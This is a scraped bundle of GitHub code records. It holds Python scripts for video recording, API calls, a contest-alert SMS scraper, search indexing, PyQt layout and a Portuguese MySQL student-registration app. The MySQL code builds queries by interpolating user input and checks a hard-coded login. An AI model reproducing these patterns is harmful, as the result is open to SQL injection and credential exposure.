self.right]","repo_name":"DemonZhou/leetcode","sub_path":"searchRange.py","file_name":"searchRange.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4623099448","text":"import numpy as np\nimport os.path as op\nimport cv2\nimport time\nimport argparse\nfrom pathlib2 import Path\n\n# Standard Video Dimensions Sizes\nSTD_DIMENSIONS = {\n    \"240p\": (426, 240),\n    \"360p\": (640, 360),\n    \"480p\": (854, 480),\n    \"720p\": (1280, 720),\n    \"1080p\": (1920, 1080),\n    \"2k\": (2560, 1440),\n    \"4k\": (3840, 2160),\n\n    \"d346\":(346, 260) # DAVIS DVS Camera\n}\n\n# Video Encoding, might require additional installs\n# Types of Codes: http://www.fourcc.org/codecs.php\nVIDEO_TYPE = {\n    '.avi': cv2.VideoWriter_fourcc(*'XVID'),\n    # '.mp4': cv2.VideoWriter_fourcc(*'h264'),\n    '.mp4': cv2.VideoWriter_fourcc(*'mp4v'),\n}\n\nclass VideoRecorder():\n    \"\"\" Record a video using certain parameters, and output a timestamps log.\n    Args:\n        out_path: The path to output the video.\n        fps: Frame per second.\n        width: The video frame width.\n        height: The video frame height.\n        res: Standard resolutions.\n        timelog: Whether to keep a timestamps log.\n    \"\"\"\n    def __init__(self, out_path=None, fps=30, width=1280, height=720, res=None, timelog=True) -> None:\n        assert res in ['240p', '360p', '480p', '720p', '1080p', '2k', '4k', 'd346', None]\n        self.out_path = out_path if out_path is not None else 'video.avi'\n        self.out_path = get_new_path(self.out_path)\n        self.fps = fps\n        self.width = width\n        self.height = height\n        self.res = res\n        self.timelog = timelog\n        self.cap = None\n        self.out_handler = None\n        self.video_type = self.get_video_type(self.out_path)\n        self.get_log_path()\n    \n    def start(self, cam_idx=0):\n        \"\"\" Start a video stream using device at `cam_idx`.\n        \"\"\"\n        self.cap = cv2.VideoCapture(cam_idx)\n        self.set_dims()\n        real_size = (int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n        out_handler = cv2.VideoWriter(self.out_path, self.video_type, self.fps, real_size)\n        if self.timelog:\n            logger = open(self.log_path, 'w+')\n        while True:\n            ret, frame = self.cap.read()\n            print(frame.shape, self.width, self.height)\n            if self.timelog:\n                logger.write(str(time.time())+'\\n')\n            out_handler.write(frame)\n            cv2.imshow('frame',frame)\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n        self.cap.release()\n        out_handler.release()\n        cv2.destroyAllWindows()\n        if self.timelog:\n            logger.close()\n\n    # grab resolution dimensions and set video capture to it.\n    def set_dims(self):\n        if self.res is not None:\n            self.width, self.height = STD_DIMENSIONS[self.res]\n        # change the current capture device to the resulting resolution\n        if self.cap is not None:\n            self.change_res(self.cap, self.width, self.height)\n\n    def get_log_path(self):\n        root, name = op.split(self.out_path)\n        name = op.splitext(name)[0]\n        self.log_path = op.join(root, name+'_timestamps.txt')\n\n    # Set resolution for the video capture\n    # Function adapted from https://kirr.co/0l6qmh\n    @staticmethod\n    def change_res(cap, width, height):\n        cap.set(3, width)\n        cap.set(4, height)\n    \n    @staticmethod\n    def get_video_type(path):\n        _, ext = op.splitext(path)\n        if ext in VIDEO_TYPE:\n            return VIDEO_TYPE[ext]\n        return VIDEO_TYPE['.avi']\n\n    @staticmethod\n    def returnCameraIndexes():\n        # checks the first 10 indexes.\n        index = 0\n        arr = []\n        i = 10\n        while i > 0:\n            cap = cv2.VideoCapture(index)\n            if cap.read()[0]:\n                arr.append(index)\n                cap.release()\n            index += 1\n            i -= 1\n        print(f\"Cameras at the following indexes are valid: {arr}\")\n        return arr\n\ndef get_new_path(path):\n    \"\"\" Return a path to a file, creating its parent folder if it doesn't exist and picking a new name if the path is already taken.\n\n    If the folder/file already exists, this function will use `path`_`idx` as the new name, and make\n    the corresponding folder if `path` is a folder.\n    idx starts from 1 and keeps incrementing until it finds a name that is not in use.\n\n    If the folder and its parent folders 
don't exist, keeps making these series of folders.\n\n Args:\n path: The path of a file/folder.\n Returns:\n _ : The guaranteed new path of the folder/file.\n \"\"\"\n path = Path(path)\n root = Path(*path.parts[:-1])\n\n if not root.exists():\n root.mkdir(parents=True, exist_ok=True)\n\n if not path.exists():\n new_path = path\n if new_path.suffix == '':\n new_path.mkdir()\n else:\n idx = 1\n while True:\n stem = path.stem+\"_\"+str(idx)\n new_path = root / (stem+path.suffix)\n if not new_path.exists():\n if new_path.suffix == '':\n new_path.mkdir()\n break\n idx += 1\n return str(new_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-r', '--resolution', type=str, help='Standard resolution string.')\n parser.add_argument('-o', '--out_path', type=str, default='records/video.avi', help='The output video path.')\n \n parser.add_argument('-c', '--cam', type=int, help='Camera index')\n parser.add_argument('-f', '--fps', type=int, default=30, help='FPS.')\n parser.add_argument('-n', '--no_timelog', action='store_true', help='Do not keep time log.')\n \n args = parser.parse_args()\n rec = VideoRecorder(out_path=args.out_path, res=args.resolution, fps=args.fps, timelog=(not args.no_timelog))\n \n if args.cam is None:\n arr = rec.returnCameraIndexes()\n rec.start(arr[0])\n else:\n rec.start(args.cam)","repo_name":"miracleyoo/mlib","sub_path":"cv/video/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4209894020","text":"import requests\nappId=1018661814203004669\ndef Item_Search_API(keyword):\n Item_Search_API_Endpoint = \"https://app.rakuten.co.jp/services/api/IchibaItem/Search/20170706?\"\n Item_Search_API_serch_param={\"format\":\"json\",\"keyword\":keyword,\"applicationId\":appId}\n Item_Search_API_result = requests.get(Item_Search_API_Endpoint,Item_Search_API_serch_param).json()\n return Item_Search_API_result\ndef Ranking_API(gID):\n Ranking_API_Endpoint = \"https://app.rakuten.co.jp/services/api/IchibaItem/Ranking/20170628?\"\n Ranking_API_serch_param={\"applicationId\":appId,\"geneId\":gID}\n Ranking_API_result = requests.get(Ranking_API_Endpoint,Ranking_API_serch_param).json()\n return Ranking_API_result","repo_name":"hayate242/rakuten_online_tech_training_outdoor","sub_path":"TestCallAPI.py","file_name":"TestCallAPI.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74016740588","text":"# -*- coding: utf-8 -*-\n# @Date : 2018-05-21 15:50:58\n# @Author : Liu Huan (liuhuan@mail.las.ac.cn)\n\nimport sys\n\na = sys.argv[1]\nb = sys.argv[2]\nprint(a)\nprint(b)\n","repo_name":"LeoWood/AuxiliaryScripts","sub_path":"ExecByJava.py","file_name":"ExecByJava.py","file_ext":"py","file_size_in_byte":167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21094230470","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nfrom twilio.rest import Client\n\ntwilio_file = open(\"/home/dniewinski/.twilio/auth\", 'r')\ntwilio_auth = twilio_file.readlines()\ntwilio_file.close()\n\nSID = twilio_auth[0]\nAUTH = twilio_auth[1]\nTRIAL_NUMBER = twilio_auth[2]\nMY_NUMBER = twilio_auth[3]\n\nclient = Client(SID, AUTH)\n\npage = requests.get(\"https://www.instructables.com/contest/\")\n\nsoup = BeautifulSoup(page.content, 'html.parser')\ncurr_contests_div = 
soup.find_all(id=\"cur-contests\")[0]\ncurr_contests_imgs = curr_contests_div.find_all('img')\n\npast_contests = []\npast_contests_file_name = \"prev_contests.txt\"\nif os.path.exists(past_contests_file_name):\n past_contests_file = open(past_contests_file_name, 'r')\n for line in past_contests_file:\n past_contests.append(line.rstrip().lstrip())\n past_contests_file.close()\n\npast_contests_file = open(past_contests_file_name, 'w')\n\ntext_message = \"\"\nnew_contest = False\nfor img in curr_contests_imgs:\n contest = img.get('alt')\n past_contests_file.write(contest + \"\\n\")\n if contest not in past_contests:\n new_contest = True\n text_message = \"!NEW! \" + contest + \"\\n\" + text_message\n else:\n text_message = text_message + contest + \"\\n\"\n\nif new_contest:\n print(text_message)\n client.messages.create(to=MY_NUMBER, from_=TRIAL_NUMBER, body=text_message)\nelse:\n print(\"Nothing New\")\n\npast_contests_file.close()\n","repo_name":"david0429/InstructablesContests","sub_path":"contests.py","file_name":"contests.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"807398935","text":"from bs4 import BeautifulSoup\nfrom whoosh.analysis import StemmingAnalyzer\nfrom pathlib import Path\nimport math\n\nclass IndexBuilder:\n def __init__(self):\n self.corpusCount = 0\n\n def storeWordPosition(self, aFile: Path):\n \"\"\"Stores the word and the position of that word(doing this for query terms) in a single file\n Ex. {word : [normalized term freq], word2:[normalized term freq], ..}\n \"\"\"\n\n corpi = aFile.open( encoding='latin-1')\n f = corpi.read()\n soup = BeautifulSoup(f, 'lxml')\n ana = StemmingAnalyzer() ### lowercases, stems, ignores stopwords\n tokens = [token.text for token in ana(soup.text)]\n print(\"Indexing: \", str(aFile))\n\n wordPosition = {}\n for token in tokens:\n if token in wordPosition.keys():\n wordPosition[token]+=1\n else:\n wordPosition[token] = 1\n\n ###weighting for h1,h2,h3,strong,b,title tags for now (boosting tf score)\n # soup = BeautifulSoup(f, 'lxml')\n # for words in soup.find_all('h1'):\n # important = [token for token in word_tokenize(str(words.text).lower()) if token not in stopset and re.match(\"^[a-z].+[a-z]$\", token) ]\n # for token in important:\n # wordPosition[token]+=3\n\n\n return self.normalize(wordPosition)\n\n def normalize(self, wordPosition: dict): ###for some reason, not normalizing leads to closer scores with lucene\n \"\"\"Normalize frequencies \"\"\"\n magnitude = 0.0\n for word in wordPosition.keys():\n wordPosition[word] = 1 + math.log10(wordPosition[word])\n # magnitude += wordPosition[word] ** 2;\n # magnitude = math.sqrt(magnitude)\n # for word in wordPosition.keys():\n # wordPosition[word] /= magnitude\n return wordPosition\n\n def storeDocToWord(self):\n \"\"\" {docID: {word: [normalized tf],...}, ...} \"\"\"\n files = self.fileSearch(Path('WEBPAGES_SIMPLE'))\n total = {}\n for filename in files:\n total[str(filename)[16:]] = self.storeWordPosition(filename)\n return total\n\n def buildInvertedIndex(self):\n docToWords = self.storeDocToWord()\n invertedIndex = {}\n for filename in docToWords.keys():\n for word in docToWords[filename].keys():\n if word in invertedIndex.keys():\n invertedIndex[word].update({filename: docToWords[filename][word]})\n else:\n invertedIndex[word] = {filename: docToWords[filename][word]}\n return invertedIndex\n\n\n def fileSearch(self, path: Path):\n \"\"\"Goes through CORPUS, adds each file 
that needs to be indexed\"\"\"\n filesToIndex = [];\n for directory in path.iterdir():\n try:\n if(directory.is_dir()):\n for item in directory.iterdir():\n filesToIndex.append(item)\n self.corpusCount+=1\n except:\n print(\"Error while adding files to index\")\n return filesToIndex\n\n def getCorpusCount(self):\n return self.corpusCount\n\n\nimport sys\n\ndef get_size(obj, seen=None):\n \"\"\"Recursively finds size of objects\"\"\"\n size = sys.getsizeof(obj)\n if seen is None:\n seen = set()\n obj_id = id(obj)\n if obj_id in seen:\n return 0\n # Important mark as seen *before* entering recursion to gracefully handle\n # self-referential objects\n seen.add(obj_id)\n if isinstance(obj, dict):\n size += sum([get_size(v, seen) for v in obj.values()])\n size += sum([get_size(k, seen) for k in obj.keys()])\n elif hasattr(obj, '__dict__'):\n size += get_size(obj.__dict__, seen)\n elif hasattr(obj, '__iter__') and not isinstance(obj, (str, bytes, bytearray)):\n size += sum([get_size(i, seen) for i in obj])\n return size\n\n\nif __name__ == '__main__':\n test = IndexBuilder()\n x = test.buildInvertedIndex()\n print(get_size(x))\n","repo_name":"geoprism/Search-Engine","sub_path":"EngineFromScratch/indexBuilder.py","file_name":"indexBuilder.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7936055021","text":"#cuffquant\nclass CuffQuant(object):\n\tdef __init__(self, annotationFile=None, bamfile=None, genomeFile=None, outputDir=\"./\"):\n\t\tself.exe = '/share/apps/cufflinks-2.2.1.Linux_x86_64/cuffquant' \n\t\tself.annotationFile = annotationFile\n\t\tself.bamFile = bamfile\n\t\tself.genomeFile = genomeFile\n\t\tself.outputDir = outputDir\n\t\tself.threads = 8\n\n\tdef makeCommand(self):\n\t\targlist = [ \"%s\" % self.exe ]\n\t\targlist.extend([ \"-p %s \" % self.threads ])\n\t\targlist.extend([ \"-o %s \" % self.outputDir ])\n\t\tif self.genomeFile is not None:\n\t\t\t# bias correction\n\t\t\targlist.extend([ \"-b %s \" % self.genomeFile ])\n\t\t# rescue multireads\n\t\targlist.extend([ \"-u \" ])\n\t\t# GTF file\n\t\targlist.extend([ \"%s\" % self.annotationFile])\n\t\targlist.extend([ \"%s\" % self.bamFile])\n\n\t\tcmd = \" \".join(arglist)\n\t\treturn cmd\n","repo_name":"anykine/rnaseq_tools","sub_path":"scripts/cuffquant.py","file_name":"cuffquant.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39719965161","text":"from flask import Flask\nimport pytest\n\nfrom api.blueprints.drbLink import linkFetch\nfrom api.utils import APIUtils\n\nclass TestLinkBlueprint:\n @pytest.fixture\n def mockUtils(self, mocker):\n return mocker.patch.multiple(\n APIUtils,\n formatResponseObject=mocker.DEFAULT,\n formatLinkOutput=mocker.DEFAULT\n )\n \n @pytest.fixture\n def testApp(self):\n flaskApp = Flask('test')\n flaskApp.config['DB_CLIENT'] = 'testDBClient'\n\n return flaskApp\n\n def test_linkFetch_success(self, mockUtils, testApp, mocker):\n mockDB = mocker.MagicMock()\n mockDBClient = mocker.patch('api.blueprints.drbLink.DBClient')\n mockDBClient.return_value = mockDB\n\n mockDB.fetchSingleLink.return_value = 'dbLinkRecord'\n\n mockUtils['formatLinkOutput'].return_value = 'testLink'\n mockUtils['formatResponseObject'].return_value = 'singleLinkResponse'\n\n with testApp.test_request_context('/'):\n testAPIResponse = linkFetch(1)\n\n assert testAPIResponse == 'singleLinkResponse'\n 
mockDBClient.assert_called_once_with('testDBClient')\n\n mockUtils['formatLinkOutput'].assert_called_once_with('dbLinkRecord')\n mockUtils['formatResponseObject'].assert_called_once_with(\n 200, 'singleLink', 'testLink'\n )\n\n def test_editionFetch_missing(self, mockUtils, testApp, mocker):\n mockDB = mocker.MagicMock()\n mockDBClient = mocker.patch('api.blueprints.drbLink.DBClient')\n mockDBClient.return_value = mockDB\n\n mockDB.fetchSingleLink.return_value = None\n\n mockUtils['formatResponseObject'].return_value = '404Response'\n\n with testApp.test_request_context('/'):\n testAPIResponse = linkFetch(1)\n\n assert testAPIResponse == '404Response'\n mockDBClient.assert_called_once_with('testDBClient')\n\n mockUtils['formatLinkOutput'].assert_not_called()\n mockUtils['formatResponseObject'].assert_called_once_with(\n 404, 'singleLink', {'message': 'Unable to locate link #1'}\n )\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"tests/unit/test_api_link_blueprint.py","file_name":"test_api_link_blueprint.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"73598169388","text":"from subprocess import PIPE, Popen as popen\nfrom unittest import TestCase\n\nfrom betrack import __cli__ as CLI\nfrom betrack import __version__ as VERSION\n\nclass TestHelp(TestCase):\n def test_returns_usage_information(self):\n output = popen(['betrack', '-h'], stdout=PIPE).communicate()[0]\n self.assertTrue(b'Usage:' in output)\n\n output = popen(['betrack', '--help'], stdout=PIPE).communicate()[0]\n self.assertTrue(b'Usage:' in output)\n\n\nclass TestVersion(TestCase):\n def test_returns_version_information(self):\n output = popen(['betrack', '--version'], stdout=PIPE).communicate()[0]\n self.assertEqual(output.strip(), CLI.encode() + b' ' + VERSION.encode())\n","repo_name":"gvalentini85/betrack-cli","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16838176932","text":"# 使用网格布局\nimport sys\nfrom PyQt5.QtWidgets import QMainWindow, \\\n QApplication, \\\n QStatusBar, \\\n QMenuBar, \\\n QAction, \\\n QMenu, \\\n QLabel, \\\n QPushButton, \\\n QVBoxLayout, \\\n QHBoxLayout, QWidget, \\\n QGridLayout\nfrom PyQt5.QtCore import Qt\n\n\nclass GUI(QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('我是一个window Title')\n self.resize(500, 300)\n self.setMinimumSize(200, 200)\n self.setMaximumSize(500, 600)\n\n # 调用方法\n self.add_menu_and_status()\n\n # 调用布局方法\n self.add_postion_layout()\n\n # 设置状态和菜单\n def add_menu_and_status(self):\n # 设置状态栏\n status = QStatusBar()\n status.showMessage('显示文本')\n self.setStatusBar(status)\n\n # self.statusBar().showMessage('文本信息')\n\n # 添加菜单栏\n menu = self.menuBar()\n # 创建一个菜单\n file_menu = menu.addMenu('文件')\n # 创建一个行为\n new_action = QAction('新建文件', self)\n # 将行为添加到菜单\n file_menu.addAction(new_action)\n file_menu.addSeparator()\n # 更新状态栏文本\n new_action.setStatusTip('点击可以新建一个文件')\n\n edit_menu = menu.addMenu('修改')\n change_acion = QAction('设置', self)\n edit_menu.addAction(change_acion)\n\n # 创建另一个行为\n exit_action = QAction('退出', self)\n # 退出操作\n exit_action.setStatusTip(\"点击退出程序\")\n # 点击关闭应用\n exit_action.triggered.connect(self.close)\n # 设置快捷键\n exit_action.setShortcut('Ctrl+Q')\n # 添加退出行为到菜单上\n file_menu.addAction(exit_action)\n\n # 添加控件\n def 
add_postion_layout(self):\n label = QLabel(\"第一个标签\", self)\n\n label.move(20, 30)\n label2 = QLabel(\"第二个标签\", self)\n # height = self.menuBar().height()\n # print('height= f',height)\n button_1 = QPushButton('按钮1', self)\n button_1.move(50, 60)\n button_2 = QPushButton('按钮2', self)\n button_2.move(150, 60)\n\n button_3 = QPushButton('按钮3', self)\n\n # 创建一个网格布局对对象\n grid_layout = QGridLayout()\n\n grid_layout.addWidget(label, 0, 0)\n grid_layout.addWidget(button_1, 0, 1)\n grid_layout.addWidget(label2, 1, 0)\n grid_layout.addWidget(button_2, 1, 1)\n grid_layout.addWidget(button_3, 2, 0, 1, 5)\n\n # 设置对齐方式\n grid_layout.setAlignment(Qt.AlignTop)\n # grid_layout.setAlignment(Qt.AlignBottom)\n # grid_layout.setAlignment(Qt.AlignRight)\n\n # 创建一个窗口对象\n layout_widget = QWidget()\n layout_widget.setLayout(grid_layout)\n\n self.setCentralWidget(layout_widget)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n gui = GUI()\n gui.show()\n sys.exit(app.exec_())\n","repo_name":"CYZZ/LearningPython-100day","sub_path":"MyGUIpy/myQTDemo4.py","file_name":"myQTDemo4.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23254905559","text":"from torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import _LRScheduler\n\n\nclass LinearWarmup(_LRScheduler):\n def __init__(self,\n optimizer: Optimizer,\n lr: float,\n num_steps: int,\n *args,\n **kwargs):\n self._lr = lr\n self._num_steps = num_steps\n super().__init__(optimizer, *args, **kwargs)\n\n def get_lr(self):\n lr_scale = min(1.0, float(self._step_count + 1) /\n float(self._num_steps))\n lr = lr_scale * self._lr\n return [lr] * len(self.optimizer.param_groups)\n","repo_name":"thavlik/machine-learning-portfolio","sub_path":"src/linear_warmup.py","file_name":"linear_warmup.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"74562660586","text":"\"\"\"\nThe implementation of the daily script invoked by `kgx daily`.\n\"\"\"\nimport datetime\n\nfrom base import goals as goals_service\nfrom base.database import Database, Row\nfrom base.utils import KgDate\n\nMONDAY = 0\nWEDNESDAY = 2\nTHURSDAY = 3\nFRIDAY = 4\nSATURDAY = 5\nSUNDAY = 6\n\n\ndef daily_task(db: Database, date: datetime.date) -> None:\n \"\"\"\n Unconditionally runs the daily script.\n\n Unlike ``kgx daily``, this function DOES NOT check if the daily script has already\n been run. 
Callers of this function should generally do so themselves since running\n the daily script multiple times on the same day can cause redundant data in the\n database.\n \"\"\"\n # On the first day of the month...\n if date.day == 1:\n # ...freeze the progress of auto-progress goals.\n freeze_auto_progress_goals(db, date)\n\n create_recurring_expenses(db, date)\n\n\ndef create_recurring_expenses(db: Database, date: datetime.date) -> None:\n # Create any recurring expenses, e.g.\n # if date.day == 1:\n # db.insert(\n # \"credits\",\n # {\n # \"date_paid\": date,\n # \"date_incurred\": date,\n # \"amount\": decimal.Decimal(\"10\"),\n # \"vendor\": get_vendor(db, \"Spotify\"),\n # \"category\": get_credit_category(db, \"Recreation\", \"Music\"),\n # \"payment_method\": \"Discover\",\n # },\n # )\n pass\n\n\ndef get_vendor(db: Database, name: str) -> Row:\n vendor = db.get(\"vendors\", where=\"name = :name\", values={\"name\": name})\n if vendor is None:\n raise Exception(f\"no vendor named {name!r} found\")\n return vendor[\"id\"]\n\n\ndef get_credit_category(db: Database, category: str, subcategory: str) -> Row:\n category_row = db.get(\n \"credit_categories\",\n where=\"category = :category AND subcategory = :subcategory\",\n values={\"category\": category, \"subcategory\": subcategory},\n )\n if category_row is None:\n raise Exception(f\"category {category} / {subcategory} not found\")\n return category_row[\"id\"]\n\n\ndef freeze_auto_progress_goals(db: Database, date: datetime.date) -> None:\n last_day_of_timespan = date - datetime.timedelta(days=1)\n kg_date = KgDate(year=date.year, month=date.month, day=date.day)\n start_of_month = kg_date.minus(months=1)\n\n monthly_goals = db.select(\n \"goals\",\n where=\"timespan = 'month' AND date = :date\",\n values={\"date\": start_of_month.isoformat()},\n )\n for goal in monthly_goals:\n auto_progress = goals_service.get_auto_progress(db, last_day_of_timespan, goal)\n if auto_progress is not None:\n db.update_by_pk(\"goals\", goal[\"id\"], {\"progress\": auto_progress})\n\n if ((date.month - 1) % 3) == 0:\n start_of_quarter = kg_date.minus(months=3)\n\n quarterly_goals = db.select(\n \"goals\",\n where=\"timespan = 'quarter' AND date = :date\",\n values={\"date\": start_of_quarter.isoformat()},\n )\n for goal in quarterly_goals:\n auto_progress = goals_service.get_auto_progress(\n db, last_day_of_timespan, goal\n )\n if auto_progress is not None:\n db.update_by_pk(\"goals\", goal[\"id\"], {\"progress\": auto_progress})\n\n if date.month == 1:\n start_of_year = kg_date.minus(years=1)\n\n yearly_goals = db.select(\n \"goals\",\n where=\"timespan = 'year' AND date = :date\",\n values={\"date\": start_of_year.isoformat()},\n )\n for goal in yearly_goals:\n auto_progress = goals_service.get_auto_progress(\n db, last_day_of_timespan, goal\n )\n if auto_progress is not None:\n db.update_by_pk(\"goals\", goal[\"id\"], {\"progress\": auto_progress})\n","repo_name":"iafisher/khaganate-snapshot","sub_path":"base/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41818393810","text":"# Receba as tres dimensoes de um cuboide, e mostre todas as\n# coordenadas possiveis que\n# a soma não seja o valor N\n\nx = int(input())\ny = int(input())\nz = int(input())\nn = int(input())\n\nfinal = []\n\nfor i in range(x+1):\n for j in range(y+1):\n for k in range(z+1):\n if (i + j + k != n):\n final.append([i, j, 
k])\n\nprint(final)\n","repo_name":"pedroportilho/hacker-rank-python","sub_path":"exercises/08_list_comprehension.py","file_name":"08_list_comprehension.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17732625657","text":"from app import *\nfrom programa import login\n\n\nimport mysql.connector\nimport mysql.connector\nfrom tkinter import * \nfrom tkinter import messagebox\nfrom tkcalendar import *\n\n\nstatus1 = bool\n\nclass BancoDados():\n \n def conectar_bd(self):\n self.conexao = mysql.connector.connect(\n host='localhost',\n user='root',\n password='senha',\n database='database'\n )\n self.cursor = self.conexao.cursor()\n\n def desconectar_bd(self):\n self.cursor.close()\n self.conexao.close()\n\n def entrar(janela):\n #Dando valor as variaveis do App\n janela.usu = janela.usuario.get()\n janela.sen = janela.senha.get()\n\n #Conectando com o banco de dados\n janela.conectar_bd()\n\n #Comando SQL para buscar usuario\n janela.comando = f'SELECT * FROM login WHERE Usuario=\"{janela.usu}\" AND Senha={janela.sen}'\n janela.cursor.execute(janela.comando)\n janela.resultado = janela.cursor.fetchall()\n\n #Verificar se dados estão corretos\n try:\n if janela.resultado[0][0] != 'MAXTER' or janela.resultado[0][1] != '123456':\n print('Usuário não logado')\n elif janela.resultado[0][0] in 'MAXTER' and janela.resultado[0][1] in '123456':\n print('Usuário logado')\n global status1\n status1 = True\n # messagebox.showinfo(title='Curso maxter', message='Usuário logado')\n return status1\n except:\n status1 = False\n print(status1)\n print('Usuario não existe')\n # messagebox.showinfo(title='Curso Maxter', message='ERRO!\\nPor Favor, tente novamente')\n return status1\n \n #Fechar banco de dados\n janela.desconectar_bd()\n\n return status1\n\n def sair(self):\n\n #Comando para voltar Tela de Login\n global status\n status = False\n if status == False:\n self.destroy()\n \n def salvar(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comando SQL para salvar dados usuario\n self.comando = f'''INSERT INTO cadastro1 (duracao_inicio, duracao_fim, curso, turno, escola, \n nome_aluno, data_nascimento, cpf, identidade,\n estado_civil, email, celular,\n cep, endereço, bairro, cidade,\n pai, mae,\n nome_responsavel, email_responsavel, cpf_responsavel, identidade_responsavel, celular_responsavel,\n valor_total, taxa_matricula, plano_1, plano_2, atual) \n VALUES (\"{self.duracao_inicio.get()}\", \"{self.duracao_fim.get()}\", \"{self.curso.get()}\", \"{self.turno.get()}\", \"{self.escola.get()}\",\n \"{self.nome_aluno.get()}\", \"{self.data_nascimento.get()}\", \"{self.cpf_aluno.get()}\", \"{self.identidade_aluno.get()}\",\n \"{self.estado_civil.get()}\", \"{self.email_aluno.get()}\", \"{self.celular_aluno.get()}\",\n \"{self.cep.get()}\", \"{self.endereco.get()}\", \"{self.bairro.get()}\", \"{self.cidade.get()}\", \n \"{self.pai.get()}\", \"{self.mae.get()}\",\n \"{self.nome_responsavel.get()}\", \"{self.email_responsavel.get()}\", \"{self.cpf_responsavel.get()}\", \"{self.identidade_responsavel.get()}\", \"{self.celular_responsavel.get()}\",\n \"{self.valor_total.get()}\", \"{self.taxa_matricula.get()}\", \"{self.plano_1.get()}\", \"{self.plano_2.get()}\", \"1\")'''\n self.cursor.execute(self.comando)\n self.conexao.commit()\n messagebox.showinfo('Curso Maxter', 'Aluno salvo com sucesso.')\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel salvar 
dados.')\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n def atualizar(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n # try:\n # #Comando SQL para buscar ID usuario\n # self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_aluno.get()}\" '\n # self.cursor.execute(self.comando)\n # self.resultado = self.cursor.fetchall()\n\n # self.id = self.resultado[0][0]\n # except:\n # messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n try:\n #Comandos SQL para atualizar dados usuario\n self.comando = f'''\n UPDATE cadastro1\n SET duracao_inicio = \"{self.duracao_inicio.get()}\", duracao_fim = \"{self.duracao_fim.get()}\", curso = \"{self.curso.get()}\", turno = \"{self.turno.get()}\", escola = \"{self.escola.get()}\",\n nome_aluno = \"{self.nome_aluno.get()}\", data_nascimento = \"{self.data_nascimento.get()}\", cpf = \"{self.cpf_aluno.get()}\", identidade = \"{self.identidade_aluno.get()}\",\n estado_civil = \"{self.estado_civil.get()}\", email = \"{self.email_aluno.get()}\", celular = \"{self.celular_aluno.get()}\", \n cep = \"{self.cep.get()}\", endereço = \"{self.endereco.get()}\", bairro = \"{self.bairro.get()}\", cidade = \"{self.cidade.get()}\",\n pai = \"{self.pai.get()}\", mae = \"{self.mae.get()}\", \n nome_responsavel = \"{self.nome_responsavel.get()}\", email_responsavel = \"{self.email_responsavel.get()}\", cpf_responsavel = \"{self.cpf_responsavel.get()}\", identidade_responsavel = \"{self.identidade_responsavel.get()}\", celular_responsavel = \"{self.celular_responsavel.get()}\",\n valor_total = \"{self.valor_total.get()}\", taxa_matricula = \"{self.taxa_matricula.get()}\", plano_1 = \"{self.plano_1.get()}\", plano_2 = \"{self.plano_2.get()}\"\n WHERE nome_aluno = \"{self.nome_aluno.get()}\" or cpf = \"{self.cpf_aluno.get()}\" '''\n self.cursor.execute(self.comando)\n self.conexao.commit()\n messagebox.showinfo('Curso Maxter', 'Aluno atualizado com sucesso.')\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel achar usuario.')\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def mudarStatus(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comandos SQL para atualizar dados usuario\n self.comando = f'''\n UPDATE cadastro1\n SET status = \"NÃO PAGO\" \n WHERE id >= 0'''\n self.cursor.execute(self.comando)\n self.conexao.commit()\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel Atualizar Status.')\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscar(self):\n\n #Conectando com o 